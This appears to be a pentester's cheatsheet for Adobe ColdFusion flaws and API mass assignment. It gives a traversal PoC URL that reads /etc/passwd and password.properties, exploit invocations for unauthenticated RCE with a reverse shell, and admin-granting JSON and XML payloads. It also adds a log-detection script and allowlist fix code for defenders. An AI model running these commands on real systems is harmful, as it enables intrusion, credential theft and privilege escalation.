🛡️ Methodology Checklist
- ColdFusion: identify version via admin page or /CFIDE/administrator/
- CVE-2010-2861: directory traversal for password hash
- CVE-2009-2265: unauthenticated file upload RCE
- Crack ColdFusion SHA1 hash: hashcat -m 100
- Mass Assignment: test API object parameters for unexposed fields
- Add isAdmin: true or role: admin to JSON POST body
- Test PATCH/PUT methods if GET/POST are filtered
- Document parameters that should not be user-controllable
🎯 Operational Context
Use when: Adobe ColdFusion identified, or REST API with mass assignment vulnerability → exploit directory traversal for CF config read, or over-permissive JSON binding.
Think Dumber First: ColdFusion older than 2018 update 3 → check for /CFIDE/administrator/ default admin, and CVE-2010-2861 directory traversal. Mass assignment: add "isAdmin":true or "role":"admin" to any JSON POST body and check if it takes effect.
Skip when: ColdFusion is current version with patches and no CFIDE exposed.
⚡ Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
| nmap -p- -sV -sC -Pn [TARGET_IP] --open | Full scan → ColdFusion default port 8500 not in top 1000 |
| searchsploit adobe coldfusion | Find CF exploits by version |
| curl -s http://[TARGET_IP]:8500/CFIDE/administrator/settings/mappings.cfm?locale=../../../../../../../../etc/passwd | ColdFusion CVE-2010-2861 directory traversal PoC |
| python2 14641.py [TARGET_IP] 8500 "../../../../../../../../ColdFusion8/lib/password.properties" | Leak CF admin password SHA1 hash (searchsploit -p 14641) |
| python3 50057.py | CF 8 ≤ 8.0.1 unauthenticated RCE via FCKeditor (CVE-2009-2265) |
🔬 Deep Dive & Workflow
Web Mass Assignment
| Parameter | Common Impact |
|---|---|
| admin / is_admin | Administrative access |
| role / role_id | Privilege escalation |
| confirmed / active | Bypass email/admin verification |
| balance / amount | Financial manipulation |
| plan_id | Account tier upgrade |
Attack flow:
1. Observe standard registration/update params
2. GET /profile → inspect JSON response for hidden fields
3. Add sensitive param to POST/PUT body:
username=test&password=P@ss&confirmed=true
or JSON: {"user":{"username":"test","admin":true}}
4. Verify: log in → check if admin panel / approved status accessible
Parameter discovery without source:
# Arjun automated parameter finder
arjun -u http://[TARGET_IP]/register -m POST
# Burp Intruder: fuzz parameter names with SecLists param wordlist
Content-Type trick: If application/x-www-form-urlencoded fails, switch to application/json in Burp → frameworks handle them differently.
ColdFusion Fingerprinting
Port: 8500 (default) → MUST use nmap -p- to find
Indicators:
- /CFIDE/ or /cfdocs/ directories
- Cookie names: CFID, CFTOKEN
- Extensions: .cfm (pages), .cfc (components)
- Header: X-Powered-By: ColdFusion
Admin panel paths:
http://[IP]:8500/CFIDE/administrator/index.cfm
http://[IP]:8500/CFIDE/administrator/enter.cfm
ColdFusion Attack Paths
CVE-2010-2861 (CF 8/9 directory traversal):
→ locale parameter in admin CFM files → read arbitrary files
→ Target: lib/password.properties → SHA1 admin hash
→ Crack hash or use in admin login
→ Python2 exploit: searchsploit -p 14641
CVE-2009-2265 (CF ≤ 8.0.1 unauthenticated RCE):
→ FCKeditor arbitrary file upload
→ Python3 exploit: searchsploit -p 50057
→ Edit script: lhost, lport, rhost, rport → python3 50057.py
→ Catch shell (Windows - runs as CF service account)
→ Use .jsp shells (Java-based, not .php)
CVE-2023-26360 (Modern versions):
→ Arbitrary file read / RCE → check Exploit-DB for PoC
Traversal targets:
| File | Contents |
|---|---|
| lib/password.properties | Admin + RDS password hash |
| logs/audit.log | User activity |
| lib/neo-runtime.xml | Server config + encrypted passwords |
RDS password tip: If SHA1 hash can't be cracked, try RDS password in same properties file → often weaker.
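From the defender's side, the CVE-2010-2861 pattern above (a locale value on an admin CFM page that walks the tree or names one of the traversal targets) is easy to pick out of web server logs. This is an added example, not part of the original cheatsheet; the log lines are constructed samples in combined-log style, and the regex assumes that format.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (not real traffic), combined-log style.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /CFIDE/administrator/index.cfm HTTP/1.1" 200 5120
10.0.0.9 - - [01/Jan/2024:10:00:07 +0000] "GET /CFIDE/administrator/settings/mappings.cfm?locale=../../../../../../../../etc/passwd HTTP/1.1" 200 2044
10.0.0.9 - - [01/Jan/2024:10:00:09 +0000] "GET /CFIDE/administrator/enter.cfm?locale=..%2F..%2F..%2FColdFusion8%2Flib%2Fpassword.properties%00en HTTP/1.1" 200 1390
10.0.0.7 - - [01/Jan/2024:10:01:12 +0000] "GET /index.cfm?locale=en_US HTTP/1.1" 200 8800
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) \S+" (?P<status>\d{3})')

# Files the cheatsheet lists as traversal targets, plus /etc/passwd from the PoC.
SENSITIVE = ("password.properties", "neo-runtime.xml", "audit.log", "etc/passwd")


def is_cfide_traversal(url: str) -> bool:
    """True when an admin CFM page receives a locale value that walks the tree
    or names a sensitive file. parse_qs decodes once; unquote again so a
    double-encoded %252e%252e is also caught, and backslash variants are normalised."""
    parts = urlsplit(url)
    if not parts.path.lower().startswith("/cfide/administrator/"):
        return False
    for value in parse_qs(parts.query).get("locale", []):
        decoded = unquote(value).replace("\\", "/")
        if "../" in decoded or any(s in decoded.lower() for s in SENSITIVE):
            return True
    return False


def find_traversal_attempts(log_text: str) -> list[dict]:
    """One record per suspicious request line: source IP for the responder,
    status code as a hint whether the file read is likely to have succeeded."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m and is_cfide_traversal(m["url"]):
            hits.append({"ip": m["ip"], "ts": m["ts"], "status": int(m["status"]), "url": m["url"]})
    return hits


if __name__ == "__main__":
    for hit in find_traversal_attempts(SAMPLE_LOG):
        print(hit["ip"], hit["ts"], hit["status"], hit["url"])
```

A 200 on one of these lines is the trigger to pull the CF version and patch level, not just to block the source.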
🛠️ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| ColdFusion admin panel not accessible | Port or path different | Try: 8500 (default CF port), /CFIDE/, /cfide/ (case-insensitive) |
| Directory traversal blocked on modern CF | Patched | Check CF version via error pages; versions before 2018 Update 3 are vulnerable |
| Mass assignment test produces no change | Framework doesn't bind extra fields | Try different field names: admin, isAdmin, role, permissions, group |
| CF scheduling task RCE fails | CF not running as admin | Task still executes as CF service account; check service account permissions |
| Mass assignment in XML format | Content-Type different | Send as XML: <root><isAdmin>true</isAdmin></root> with Content-Type: application/xml |
📝 Reporting Trigger
Finding Title: Mass Assignment Vulnerability Enables Privilege Escalation via API
Impact: Mass assignment allows clients to set server-side object properties by including additional fields in API requests, enabling privilege escalation to admin roles or modification of account properties not intended to be user-controlled.
Root Cause: API framework automatically binds all JSON/form fields to model objects without filtering. No explicit allowlist of bindable fields defined.
Recommendation: Implement explicit allowlists for API-bindable model fields. Use Data Transfer Objects (DTOs) that expose only intended fields. Audit all API endpoints for mass assignment using automated tools. Implement attribute-level access control.
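The server-side bug behind the Web Mass Assignment attack flow, beside the allowlist/DTO binding the recommendation above asks for. Added example, not code from the original cheatsheet or any framework; the User model and its field names (username, email, is_admin, confirmed) are assumed, and the nested {"user": {...}} body shape is the one shown in the attack flow.

```python
from dataclasses import dataclass, asdict


@dataclass
class User:
    username: str
    email: str
    is_admin: bool = False     # must never be client-settable
    confirmed: bool = False    # set only by the email-verification flow


def bind_unsafe(user: User, payload: dict) -> User:
    """Vulnerable pattern (the root cause in the report): every key in the request
    body that matches a model attribute is bound, so "is_admin": true or
    "confirmed": true in a profile update is silently honoured."""
    for key, value in payload.items():
        if hasattr(user, key):
            setattr(user, key, value)
    return user


# Explicit allowlist of client-changeable fields: the "DTO" from the recommendation.
PROFILE_DTO_FIELDS = frozenset({"username", "email"})


def bind_allowlisted(user: User, payload: dict) -> tuple[User, list[str]]:
    """Hardened pattern: bind only allowlisted fields. Rejected keys are returned
    so the caller can log them; a body carrying is_admin or role is itself a
    useful detection signal, not just something to drop quietly."""
    nested = payload.get("user")
    body = nested if isinstance(nested, dict) else payload   # flat or {"user": {...}}
    rejected = sorted(k for k in body if k not in PROFILE_DTO_FIELDS)
    for key in PROFILE_DTO_FIELDS & body.keys():
        setattr(user, key, body[key])
    return user, rejected


if __name__ == "__main__":
    # Constructed request body: a normal profile update carrying two extra fields.
    probe = {"username": "test", "email": "t@example.com", "is_admin": True, "confirmed": True}
    print(asdict(bind_unsafe(User("test", "old@example.com"), probe)))
    hardened, rejected = bind_allowlisted(User("test", "old@example.com"), probe)
    print(asdict(hardened), "rejected:", rejected)
```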